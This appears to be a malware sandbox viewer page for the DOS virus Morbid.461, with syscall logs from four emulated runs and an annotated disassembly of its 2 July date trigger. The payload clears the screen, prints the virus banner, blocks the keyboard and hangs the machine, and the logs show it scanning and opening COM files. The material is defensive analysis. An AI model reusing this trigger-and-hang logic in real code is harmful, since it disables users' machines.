Sample viewer

vx.netlux.org/Virus.DOS.IVP.Morbid.461


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:22.181456914Z 42 PC: 13ee5 | Get date 0x13ee5: cmp dh, 7
; Disassembly window the viewer prints at the return address of "Get date"
; (INT 21h AH=2Ah returns DH = month, DL = day of month). Together with the
; `cmp dh, 7` on the log row above, this is a date trigger for 2 July.
; In this run the log continues with the DTA/file-search calls, so the `ret`
; path was taken and the payload at 0x13ef0 did not execute.
0x13ee8: jne 0x13eef                        ; month != 7 -> skip the payload
0x13eea: cmp dl, 2                          ; day of month == 2 ?
0x13eed: je 0x13ef0                         ; month 7, day 2 -> payload
0x13eef: ret                                ; any other date: return to the caller
; --- payload, reached only on the trigger date ---
0x13ef0: xor ax, ax                         ; AH = 0 (function), AL = 0 (mode number)
0x13ef2: xor dx, dx
0x13ef4: int 0x10                           ; BIOS video AH=00h: set video mode 0, which also clears the screen
0x13ef6: mov ah, 9                          ; DOS function 09h: print '$'-terminated string at DS:DX
0x13ef8: lea dx, word ptr [bp + 0x265]      ; message address; bp presumably holds the code's base/delta offset (confirm)
0x13efc: int 0x21
0x13efe: in al, 0x21                        ; read the interrupt mask register of the primary 8259 PIC
0x13f00: or al, 2                           ; set bit 1 = mask IRQ1 (keyboard)
0x13f02: out 0x21, al                       ; keyboard interrupts are blocked from here on
0x13f04: jmp 0x13f04                        ; jump-to-self: execution never leaves this address (machine hangs)
; --- different routine: not reachable by fall-through from the loop above ---
0x13f06: mov dx, word ptr [bp + 0x29b]      ; DX = pointer read from a bp-relative variable; INT 21h/43h takes the file name at DS:DX
0x13f0a: mov ax, 0x4300                     ; DOS function 43h, AL=0: get file attributes
0x13f0d: int 0x21                           ; returns at 0x13f0f, the PC of the first "Get or set file attributes" log rows
0x13f0f: lea bx, word ptr [bp + 0x28f]
0x13f13: mov word ptr [bx], cx              ; save the returned attributes (CX); the listing is cut off here
2018-12-17T22:46:22.18522357Z 47 PC: 13de4 | Get disk transfer address
2018-12-17T22:46:22.18746547Z 26 PC: 13df5 | Set disk transfer address
2018-12-17T22:46:22.189281764Z 78 PC: 13e08 | Find first file
2018-12-17T22:46:22.196514797Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.204409088Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.234542892Z 61 PC: 13e17 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:22.243975397Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.247305398Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.255412482Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.25712718Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.260598279Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.264494335Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.271239457Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.283183232Z 61 PC: 13e17 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:22.291853307Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.293941032Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.301281505Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.305478954Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.307838192Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.311268255Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.318990184Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.330913742Z 61 PC: 13e17 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:22.347711034Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.362472013Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.370712881Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.373496108Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.376827154Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.382796191Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.389508685Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.402977597Z 61 PC: 13e17 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:22.426855358Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.428801487Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.446856545Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.449895542Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.452342004Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.456615945Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.464440323Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.475777823Z 61 PC: 13e17 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:22.483650096Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.486599415Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.494494697Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.496503228Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.499657715Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.503306423Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.510002625Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.521967447Z 61 PC: 13e17 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:22.530631979Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.532653948Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.540186145Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.543264446Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.545714089Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.549141018Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.556693213Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.564439734Z 61 PC: 13e17 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:22.569230695Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.571284428Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.593079749Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.594897764Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.607292735Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.610832589Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.61729801Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.642518899Z 61 PC: 13e17 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:22.651956948Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.653933362Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.657329711Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.660465467Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.663541903Z 26 PC: 13ec5 | Set disk transfer address
2018-12-17T22:46:22.665183374Z 9 PC: 13dc6 | Display string (String= 'CDEFG-This is a 5000 byte COM test, 1994 ')

{"DateBased":true,"Day":2,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8861,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:07.002293747Z 42 PC: 13ee5 | Get date 0x13ee5: cmp dh, 7
; Disassembly window the viewer prints at the return address of "Get date"
; (INT 21h AH=2Ah returns DH = month, DL = day of month). Together with the
; `cmp dh, 7` on the log row above, this is a date trigger for 2 July.
; In this run the only later log row is "Display string" returning at
; PC 13efe with the banner text, and the log ends there: consistent with the
; payload running and then spinning at 0x13f04. The settings record printed
; just above this run has Month 7 / Day 2; presumably that is the clock this
; run was started with (confirm against the sandbox).
0x13ee8: jne 0x13eef                        ; month != 7 -> skip the payload
0x13eea: cmp dl, 2                          ; day of month == 2 ?
0x13eed: je 0x13ef0                         ; month 7, day 2 -> payload
0x13eef: ret                                ; any other date: return to the caller
; --- payload, reached only on the trigger date ---
0x13ef0: xor ax, ax                         ; AH = 0 (function), AL = 0 (mode number)
0x13ef2: xor dx, dx
0x13ef4: int 0x10                           ; BIOS video AH=00h: set video mode 0, which also clears the screen
0x13ef6: mov ah, 9                          ; DOS function 09h: print '$'-terminated string at DS:DX
0x13ef8: lea dx, word ptr [bp + 0x265]      ; message address; bp presumably holds the code's base/delta offset (confirm)
0x13efc: int 0x21                           ; returns at 0x13efe, the PC of the "Display string" log row below
0x13efe: in al, 0x21                        ; read the interrupt mask register of the primary 8259 PIC
0x13f00: or al, 2                           ; set bit 1 = mask IRQ1 (keyboard)
0x13f02: out 0x21, al                       ; keyboard interrupts are blocked from here on
0x13f04: jmp 0x13f04                        ; jump-to-self: execution never leaves this address (machine hangs)
; --- different routine: not reachable by fall-through from the loop above ---
0x13f06: mov dx, word ptr [bp + 0x29b]      ; DX = pointer read from a bp-relative variable; INT 21h/43h takes the file name at DS:DX
0x13f0a: mov ax, 0x4300                     ; DOS function 43h, AL=0: get file attributes
0x13f0d: int 0x21
0x13f0f: lea bx, word ptr [bp + 0x28f]
0x13f13: mov word ptr [bx], cx              ; save the returned attributes (CX); the listing is cut off here
2018-12-25T12:22:07.011746647Z 9 PC: 13efe | Display string (String= 'The MORBID(OS) virus V2.00')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8861,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:07.23076612Z 42 PC: 13ee5 | Get date 0x13ee5: cmp dh, 7
; Disassembly window the viewer prints at the return address of "Get date"
; (INT 21h AH=2Ah returns DH = month, DL = day of month). Together with the
; `cmp dh, 7` on the log row above, this is a date trigger for 2 July.
; In this run the log continues with the DTA/file-search calls, so the `ret`
; path was taken. The settings record printed just above this run has
; Month 1 / Day 1; presumably that is the clock this run was started with
; (confirm against the sandbox).
0x13ee8: jne 0x13eef                        ; month != 7 -> skip the payload
0x13eea: cmp dl, 2                          ; day of month == 2 ?
0x13eed: je 0x13ef0                         ; month 7, day 2 -> payload
0x13eef: ret                                ; any other date: return to the caller
; --- payload, reached only on the trigger date ---
0x13ef0: xor ax, ax                         ; AH = 0 (function), AL = 0 (mode number)
0x13ef2: xor dx, dx
0x13ef4: int 0x10                           ; BIOS video AH=00h: set video mode 0, which also clears the screen
0x13ef6: mov ah, 9                          ; DOS function 09h: print '$'-terminated string at DS:DX
0x13ef8: lea dx, word ptr [bp + 0x265]      ; message address; bp presumably holds the code's base/delta offset (confirm)
0x13efc: int 0x21
0x13efe: in al, 0x21                        ; read the interrupt mask register of the primary 8259 PIC
0x13f00: or al, 2                           ; set bit 1 = mask IRQ1 (keyboard)
0x13f02: out 0x21, al                       ; keyboard interrupts are blocked from here on
0x13f04: jmp 0x13f04                        ; jump-to-self: execution never leaves this address (machine hangs)
; --- different routine: not reachable by fall-through from the loop above ---
0x13f06: mov dx, word ptr [bp + 0x29b]      ; DX = pointer read from a bp-relative variable; INT 21h/43h takes the file name at DS:DX
0x13f0a: mov ax, 0x4300                     ; DOS function 43h, AL=0: get file attributes
0x13f0d: int 0x21                           ; returns at 0x13f0f, the PC of the first "Get or set file attributes" log rows
0x13f0f: lea bx, word ptr [bp + 0x28f]
0x13f13: mov word ptr [bx], cx              ; save the returned attributes (CX); the listing is cut off here
2018-12-25T12:22:07.233958625Z 47 PC: 13de4 | Get disk transfer address
2018-12-25T12:22:07.235027836Z 26 PC: 13df5 | Set disk transfer address
2018-12-25T12:22:07.236007292Z 78 PC: 13e08 | Find first file
2018-12-25T12:22:07.242690047Z 67 PC: 13f0f | Get or set file attributes
2018-12-25T12:22:07.253089079Z 67 PC: 13f1c | Get or set file attributes
2018-12-25T12:22:07.271040559Z 61 PC: 13e17 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:07.282314837Z 87 PC: 13e1f | Get or set file date and time
2018-12-25T12:22:07.283954339Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:07.290424234Z 66 PC: 13ee0 | Move file pointer
2018-12-25T12:22:07.291648699Z 62 PC: 13e82 | Close file
2018-12-25T12:22:07.294211226Z 79 PC: 13e86 | Find next file
2018-12-25T12:22:07.296809337Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.302167012Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.324704334Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.33130198Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.332574435Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.339646375Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.341177777Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.342973364Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.34640029Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.35218997Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.362576375Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.370640103Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.372018944Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.378317962Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.380073699Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.382705434Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.385617641Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.391417925Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.404618407Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.411714014Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.413546162Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.420632077Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.421976007Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.423687872Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.426924993Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.432763677Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.442765138Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.450005277Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.451674769Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.458564466Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.460756651Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.462571272Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.46559442Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.472045624Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.48199235Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.488448496Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.490533775Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.496865317Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.49834335Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.500785686Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.503464857Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.509023019Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.519129854Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.525711371Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.527338918Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.534263694Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.535887054Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.537840059Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.542174274Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.547992306Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.557853619Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.565052761Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.566538885Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.573136326Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.575250511Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.576997059Z 26 PC: 13ec5 | Set disk transfer address
2018-12-25T12:22:07.577814608Z 9 PC: 13dc6 | Display string (String= 'CDEFG-This is a 5000 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8861,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:11.68917761Z 42 PC: 13ee5 | Get date 0x13ee5: cmp dh, 7
; Disassembly window the viewer prints at the return address of "Get date"
; (INT 21h AH=2Ah returns DH = month, DL = day of month). Together with the
; `cmp dh, 7` on the log row above, this is a date trigger for 2 July.
; In this run the log continues with the DTA/file-search calls, so the `ret`
; path was taken. The settings record printed just above this run has
; Month 7 / Day 1: the month test would pass and the day test fail, if that
; record is the clock this run was started with (confirm against the sandbox).
0x13ee8: jne 0x13eef                        ; month != 7 -> skip the payload
0x13eea: cmp dl, 2                          ; day of month == 2 ?
0x13eed: je 0x13ef0                         ; month 7, day 2 -> payload
0x13eef: ret                                ; any other date: return to the caller
; --- payload, reached only on the trigger date ---
0x13ef0: xor ax, ax                         ; AH = 0 (function), AL = 0 (mode number)
0x13ef2: xor dx, dx
0x13ef4: int 0x10                           ; BIOS video AH=00h: set video mode 0, which also clears the screen
0x13ef6: mov ah, 9                          ; DOS function 09h: print '$'-terminated string at DS:DX
0x13ef8: lea dx, word ptr [bp + 0x265]      ; message address; bp presumably holds the code's base/delta offset (confirm)
0x13efc: int 0x21
0x13efe: in al, 0x21                        ; read the interrupt mask register of the primary 8259 PIC
0x13f00: or al, 2                           ; set bit 1 = mask IRQ1 (keyboard)
0x13f02: out 0x21, al                       ; keyboard interrupts are blocked from here on
0x13f04: jmp 0x13f04                        ; jump-to-self: execution never leaves this address (machine hangs)
; --- different routine: not reachable by fall-through from the loop above ---
0x13f06: mov dx, word ptr [bp + 0x29b]      ; DX = pointer read from a bp-relative variable; INT 21h/43h takes the file name at DS:DX
0x13f0a: mov ax, 0x4300                     ; DOS function 43h, AL=0: get file attributes
0x13f0d: int 0x21                           ; returns at 0x13f0f, the PC of the first "Get or set file attributes" log rows
0x13f0f: lea bx, word ptr [bp + 0x28f]
0x13f13: mov word ptr [bx], cx              ; save the returned attributes (CX); the listing is cut off here
2018-12-25T13:07:11.691718053Z 47 PC: 13de4 | Get disk transfer address
2018-12-25T13:07:11.692783607Z 26 PC: 13df5 | Set disk transfer address
2018-12-25T13:07:11.693780187Z 78 PC: 13e08 | Find first file
2018-12-25T13:07:11.699874463Z 67 PC: 13f0f | Get or set file attributes
2018-12-25T13:07:11.705249788Z 67 PC: 13f1c | Get or set file attributes
2018-12-25T13:07:11.723378981Z 61 PC: 13e17 | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:07:11.734551361Z 87 PC: 13e1f | Get or set file date and time
2018-12-25T13:07:11.735938399Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-25T13:07:11.742461243Z 66 PC: 13ee0 | Move file pointer
2018-12-25T13:07:11.74553482Z 62 PC: 13e82 | Close file
2018-12-25T13:07:11.747212891Z 79 PC: 13e86 | Find next file
2018-12-25T13:07:11.749668969Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.755966096Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.762293064Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.766394901Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.767590995Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.771624773Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.772598234Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.773712167Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.776106325Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.780094635Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.789338336Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.800965909Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.802190501Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.808630737Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.810517679Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.812060429Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.814512329Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.820422402Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.830027678Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.836432533Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.838143508Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.844269418Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.845511794Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.847691958Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.850132298Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.855580144Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.86841034Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.875365239Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.876596222Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.883081801Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.884310097Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.8858453Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.888640231Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.893904403Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.90066584Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.907679232Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.909017762Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.915329972Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.917256873Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.918903171Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.921326218Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.927719278Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.940049096Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.94628474Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.947935184Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.954047291Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.955309965Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.957345274Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.959769281Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.96530275Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.976041183Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.982642473Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.984106395Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.99102989Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.992995369Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.995463454Z 26 PC: 13ec5 | Set disk transfer address
2018-12-25T13:07:11.996978079Z 9 PC: 13dc6 | Display string (String= 'CDEFG-This is a 5000 byte COM test, 1994 ')